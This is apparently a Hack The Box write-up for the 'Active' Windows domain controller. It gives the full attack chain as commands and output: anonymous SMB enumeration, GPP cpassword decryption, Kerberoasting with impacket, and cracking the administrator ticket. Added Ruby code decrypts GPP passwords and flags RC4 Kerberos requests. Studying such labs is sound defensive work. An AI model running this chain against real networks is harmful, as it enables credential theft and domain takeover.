Active
Nmap Enumeration
Scanned at 2025-05-18 23:23:23 CDT for 455s
Not shown: 981 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-05-19 04:09:03Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
49152/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49165/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49167/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
SMB Enumeration
┌──(wzwr㉿kali)-[~/Documents/htb/active]
└─$ crackmapexec smb 10.10.10.100 -u '' -p '' --shares
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\:
SMB 10.10.10.100 445 DC [+] Enumerated shares
SMB 10.10.10.100 445 DC Share Permissions Remark
SMB 10.10.10.100 445 DC ----- ----------- ------
SMB 10.10.10.100 445 DC ADMIN$ Remote Admin
SMB 10.10.10.100 445 DC C$ Default share
SMB 10.10.10.100 445 DC IPC$ Remote IPC
SMB 10.10.10.100 445 DC NETLOGON Logon server share
SMB 10.10.10.100 445 DC Replication READ
SMB 10.10.10.100 445 DC SYSVOL Logon server share
SMB 10.10.10.100 445 DC Users
Null sessions are available: anonymous access lists the shares, and the Replication share is readable without credentials.
Replication Enumeration
┌──(wzwr㉿kali)-[~/Documents/htb/active]
└─$ smbclient //10.10.10.100/Replication
Password for [WORKGROUP\wzwr]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 05:37:44 2018
.. D 0 Sat Jul 21 05:37:44 2018
active.htb D 0 Sat Jul 21 05:37:44 2018
p
5217023 blocks of size 4096. 283794 blocks available
smb: \> pwd
Current directory is \\10.10.10.100\Replication\
smb: \>
We download everything inside the share with:
PROMPT OFF
RECURSE ON
mget *
Viewing the structure of the downloaded directory:
┌──(wzwr㉿kali)-[~/Documents/htb/active]
└─$ tree .
.
├── DfsrPrivate
│   ├── ConflictAndDeleted
│   ├── Deleted
│   └── Installing
├── Policies
│   ├── {31B2F340-016D-11D2-945F-00C04FB984F9}
│   │   ├── GPT.INI
│   │   ├── Group Policy
│   │   │   └── GPE.INI
│   │   ├── MACHINE
│   │   │   ├── Microsoft
│   │   │   │   └── Windows NT
│   │   │   │       └── SecEdit
│   │   │   │           └── GptTmpl.inf
│   │   │   ├── Preferences
│   │   │   │   └── Groups
│   │   │   │       └── Groups.xml
│   │   │   └── Registry.pol
│   │   └── USER
│   └── {6AC1786C-016F-11D2-945F-00C04fB984F9}
│       ├── GPT.INI
│       ├── MACHINE
│       │   └── Microsoft
│       │       └── Windows NT
│       │           └── SecEdit
│       │               └── GptTmpl.inf
│       └── USER
├── nmap
└── scripts
Groups.xml is not a default file, so we look inside it:
┌──(wzwr㉿kali)-[~/Documents/htb/active]
└─$ cat Policies/\{31B2F340-016D-11D2-945F-00C04FB984F9\}/MACHINE/Preferences/Groups/Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
We found credentials with an encrypted password (the cpassword attribute), which gpp-decrypt recovers:
┌──(wzwr㉿kali)-[~/Documents/htb/active]
└─$ gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18
SVC_TGS:GPPstillStandingStrong2k18
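As an added example (not the writeup's own tooling), the Ruby below reproduces what gpp-decrypt does to the cpassword above and wraps it in a small audit check for Groups.xml files pulled from SYSVOL; the AES key is the one Microsoft published for Group Policy Preferences, and the sample XML is the Groups.xml shown above.

```ruby
# Added example: decrypt a Group Policy Preferences cpassword and audit a
# Groups.xml for such values. The AES-256 key is the one Microsoft published
# in MS-GPPREF (2.2.1.1.4), which is why any cpassword left in SYSVOL is
# readable by every domain user who can read the share.
require 'openssl'

GPP_AES_KEY = ['4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'].pack('H*').freeze

def gpp_decrypt(cpassword)
  # The XML stores Base64 without '=' padding; restore it before decoding.
  padded = cpassword + '=' * ((4 - cpassword.length % 4) % 4)
  ciphertext = padded.unpack1('m')
  cipher = OpenSSL::Cipher.new('aes-256-cbc')
  cipher.decrypt
  cipher.key = GPP_AES_KEY
  cipher.iv = "\0" * 16                              # zero IV, per the spec
  plain = cipher.update(ciphertext) + cipher.final  # PKCS#7 padding removed
  plain.force_encoding('UTF-16LE').encode('UTF-8')  # GPP stores UTF-16LE
end

# Scan Groups.xml text for embedded cpassword values.
# Returns [userName, decrypted password] pairs, one per <Properties> element.
def audit_gpp_xml(xml)
  xml.scan(/<Properties\b[^>]*\bcpassword="([^"]+)"[^>]*\buserName="([^"]*)"/).map do |cpw, user|
    [user, gpp_decrypt(cpw)]
  end
end

# Constructed sample: the Groups.xml retrieved from the Replication share above.
SAMPLE_GROUPS_XML = <<~XML
  <?xml version="1.0" encoding="utf-8"?>
  <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\\SVC_TGS"/></User>
  </Groups>
XML

if __FILE__ == $0
  audit_gpp_xml(SAMPLE_GROUPS_XML).each { |user, pw| puts "#{user} -> #{pw}" }
end
```

Running the same scan over every Preferences XML under SYSVOL (Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml, Printers.xml) is the audit a domain owner wants, since each of those files can carry a cpassword.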
New Credentials SMB Enumeration
┌──(wzwr㉿kali)-[~/Documents/htb/active]
└─$ crackmapexec smb active.htb -u "svc_tgs" -p "GPPstillStandingStrong2k18" --shares
SMB active.htb 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB active.htb 445 DC [+] active.htb\svc_tgs:GPPstillStandingStrong2k18
SMB active.htb 445 DC [+] Enumerated shares
SMB active.htb 445 DC Share Permissions Remark
SMB active.htb 445 DC ----- ----------- ------
SMB active.htb 445 DC ADMIN$ Remote Admin
SMB active.htb 445 DC C$ Default share
SMB active.htb 445 DC IPC$ Remote IPC
SMB active.htb 445 DC NETLOGON READ Logon server share
SMB active.htb 445 DC Replication READ
SMB active.htb 445 DC SYSVOL READ Logon server share
SMB active.htb 445 DC Users READ
Users Enumeration
┌──(wzwr㉿kali)-[~/Documents/htb/active]
└─$ smbclient //10.10.10.100/Users -U 'active.htb\svc_tgs'
Password for [ACTIVE.HTB\svc_tgs]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 09:39:20 2018
.. DR 0 Sat Jul 21 09:39:20 2018
Administrator D 0 Mon Jul 16 05:14:21 2018
All Users DHSrn 0 Tue Jul 14 00:06:44 2009
Default DHR 0 Tue Jul 14 01:38:21 2009
Default User DHSrn 0 Tue Jul 14 00:06:44 2009
desktop.ini AHS 174 Mon Jul 13 23:57:55 2009
Public DR 0 Mon Jul 13 23:57:55 2009
SVC_TGS D 0 Sat Jul 21 10:16:32 2018
5217023 blocks of size 4096. 283778 blocks available
smb: \> cd Administrator
smb: \Administrator\> ls
NT_STATUS_ACCESS_DENIED listing \Administrator\*
smb: \Administrator\> cd ..
smb: \> cd SVC_TGS
smb: \SVC_TGS\> ls
. D 0 Sat Jul 21 10:16:32 2018
.. D 0 Sat Jul 21 10:16:32 2018
Contacts D 0 Sat Jul 21 10:14:11 2018
Desktop D 0 Sat Jul 21 10:14:42 2018
Downloads D 0 Sat Jul 21 10:14:23 2018
Favorites D 0 Sat Jul 21 10:14:44 2018
Links D 0 Sat Jul 21 10:14:57 2018
My Documents D 0 Sat Jul 21 10:15:03 2018
My Music D 0 Sat Jul 21 10:15:32 2018
My Pictures D 0 Sat Jul 21 10:15:43 2018
My Videos D 0 Sat Jul 21 10:15:53 2018
Saved Games D 0 Sat Jul 21 10:16:12 2018
Searches D 0 Sat Jul 21 10:16:24 2018
5217023 blocks of size 4096. 283778 blocks available
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> ls
. D 0 Sat Jul 21 10:14:42 2018
.. D 0 Sat Jul 21 10:14:42 2018
user.txt AR 34 Sun May 18 22:44:02 2025
5217023 blocks of size 4096. 283778 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \SVC_TGS\Desktop\>
Privilege Escalation
Kerberoasting
┌──(wzwr㉿kali)-[~/Documents/htb/active]
└─$ sudo impacket-GetUserSPNs -dc-ip 10.10.10.100 -request -outputfile hashes.asreproast active.htb/svc_tgs
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 14:06:40.351723 2025-05-18 22:44:06.304563
...
.. hashcat
...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$85a361edc45088512a053d72602f4cdf$4d786dc8e5a16f03a08ebdc9eed3fe492c20d2db8d4d6bcd091d9ad4882ebfa417af4d0688025e10fca3e2cb6a3e5bafa810e3b6ccf80a2efa98786757f844e07f5a22f17d98eaeb7c8604d252231f6e2faf3c451e5a71aa37792390feac783c3b41f2af80d00ef2d56d3164a8762943260e01613dd4cfe8c4d79a7a2b1cf03a14f382b5eacafc0546680af1236860a20753939f8c3c082b741a16974736912b3fa38196de04034ffaea0bf8adf3b7631942c07d4ba3e9d09bb5499e49981ff37e021337b9dd13ae845e46a0976d01fe700140693ae396dcb66c7661d2fee8524f842810ada24bf3d77a22def835bf829024b8647d287fc98217b1bb0318ef394e9ac43f5b10eba52789a0ad2a95fb552369c13aea93d9efdb6edc00be0de369fc7f3327088eb76ed840d09e7a9b8befd658ffc54c8a20ac8a0c29283514cf564d1de7660e7797d384fa76458d0ce6eb9283b7b8573d18e199f461b16dccc77f75c87bde99724326ade410a79b5366305182f704685f51f2cbac45fe19ffe1a5f2806250cd3fc23cb693b08cc43dc6fa681ca0005d4d0cac0db72354137f5e264f9c7e0efb7197e2e4b4813d88b667e78cd0ef827aa8b1f59391c766a863e5165b1b98242c4de232997f0f0522de4a375ffcdf7b507bac1ef6eb3e2bb7d6e0f43d806c7e8a9e53237fa3d91d5fa292ce932be7d459865c6408c410055d98765d30f0d8400d66844f59af080e7b1904d57c9a89a297a14129758674c1dfa71e71d40958735f994db65a1905a9764b0ff670ddf4ead60aa9b96378128a5bd8974f92f8d58ed7c04cb65a628c45fe13afef6843557ff770d2abbcbf982e5bfc31e48baffff6ec6e8760390c4a9d43f9592ae8249ad6627d7d77ecf487066b97a8b0f21404b83ac741100291fa26689dead4029727d2741eae2d309e4779ed40e30967b2ad889340d6fbfdac4e0527b51c28067d294a509d55f8a630785cb8260dd3678aad496767aebe6f8ed1f0181aa2e826da1c0bf69acf037ff043d0bcc9de1ef21d40ded7a15214af005164ad0c24973ccffd437d4b512233d55475c9c9a6095cd6c1ef1c61296fefde7dc0d31e8ac3c0bad861d7f48941a9ce959f44d7f421cc9ffd32843f05cb42e741bdc31be7197bde1ccf4d20d034d0f14707a897a244423f64574a13db550d4d8b515b68baed079cb66f7cbbb756e38d777f8b02280274d9ab980b1513845599dc57285559d8c61abb185242b036d42e:Ticketmaster1968
Administrator:Ticketmaster1968
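From the defender's side, as an added example that is not part of the original writeup: the `$krb5tgs$23$` prefix on the hash above means the service ticket was issued with RC4-HMAC (etype 0x17), so a check over Windows Security event 4769 records that flags RC4 tickets for user accounts with SPNs catches this request; the event records below are constructed, modelled on the request shown above.

```ruby
# Added example (not from the writeup): flag Kerberoast-style requests in
# Windows Security event 4769 (TGS requested). The $krb5tgs$23$ hash above
# was issued with RC4-HMAC (etype 0x17). Accounts that have not been given
# AES keys still get RC4 tickets legitimately, so treat hits as leads to
# compare against a baseline, not as proof on their own.
RC4_ETYPES = %w[0x17 0x18].freeze # 0x17 RC4-HMAC, 0x18 RC4-HMAC-EXP

# Parse the "Field: value" lines of one 4769 record into a hash.
def parse_4769(record)
  record.each_line.with_object({}) do |line, fields|
    key, value = line.split(':', 2)
    fields[key.strip] = value.strip unless value.nil?
  end
end

# A request is suspect when it targets a user account (machine accounts end
# in '$' and have random passwords) other than krbtgt and used an RC4 key.
def kerberoast_suspect?(event)
  svc = event['Service Name'].to_s
  return false if svc.empty? || svc.end_with?('$') || svc.casecmp?('krbtgt')
  RC4_ETYPES.include?(event['Ticket Encryption Type'].to_s.downcase)
end

# Returns [requesting account, service account] pairs worth investigating.
def audit_4769(records)
  records.map { |r| parse_4769(r) }
         .select { |e| kerberoast_suspect?(e) }
         .map { |e| [e['Account Name'], e['Service Name']] }
end

# Constructed sample records, modelled on the request made above.
SAMPLE_4769 = [
  "Account Name: svc_tgs@ACTIVE.HTB\nService Name: Administrator\n" \
  "Ticket Encryption Type: 0x17\nTicket Options: 0x40810000\n",
  "Account Name: svc_tgs@ACTIVE.HTB\nService Name: DC$\n" \
  "Ticket Encryption Type: 0x12\nTicket Options: 0x40810000\n",
  "Account Name: DC$@ACTIVE.HTB\nService Name: krbtgt\n" \
  "Ticket Encryption Type: 0x12\nTicket Options: 0x40810000\n"
].freeze

if __FILE__ == $0
  audit_4769(SAMPLE_4769).each { |who, svc| puts "#{who} requested an RC4 TGS for #{svc}" }
end
```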
┌──(wzwr㉿kali)-[~/Documents/htb/active]
└─$ crackmapexec smb active.htb -u 'administrator' -p 'Ticketmaster1968' --shares
SMB active.htb 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB active.htb 445 DC [+] active.htb\administrator:Ticketmaster1968 (Pwn3d!)
SMB active.htb 445 DC [+] Enumerated shares
SMB active.htb 445 DC Share Permissions Remark
SMB active.htb 445 DC ----- ----------- ------
SMB active.htb 445 DC ADMIN$ READ,WRITE Remote Admin
SMB active.htb 445 DC C$ READ,WRITE Default share
SMB active.htb 445 DC IPC$ Remote IPC
SMB active.htb 445 DC NETLOGON READ,WRITE Logon server share
SMB active.htb 445 DC Replication READ
SMB active.htb 445 DC SYSVOL READ Logon server share
SMB active.htb 445 DC Users READ
┌──(wzwr㉿kali)-[~/Documents/htb/active]
└─$ smbclient //10.10.10.100/Users -U 'active.htb\administrator'
Password for [ACTIVE.HTB\administrator]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 09:39:20 2018
.. DR 0 Sat Jul 21 09:39:20 2018
Administrator D 0 Mon Jul 16 05:14:21 2018
All Users DHSrn 0 Tue Jul 14 00:06:44 2009
Default DHR 0 Tue Jul 14 01:38:21 2009
Default User DHSrn 0 Tue Jul 14 00:06:44 2009
desktop.ini AHS 174 Mon Jul 13 23:57:55 2009
Public DR 0 Mon Jul 13 23:57:55 2009
SVC_TGS D 0 Sat Jul 21 10:16:32 2018
5217023 blocks of size 4096. 278791 blocks available
smb: \> cd Administrator/Desktop
smb: \Administrator\Desktop\> get root.txt
getting file \Administrator\Desktop\root.txt of size 34 as root.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \Administrator\Desktop\>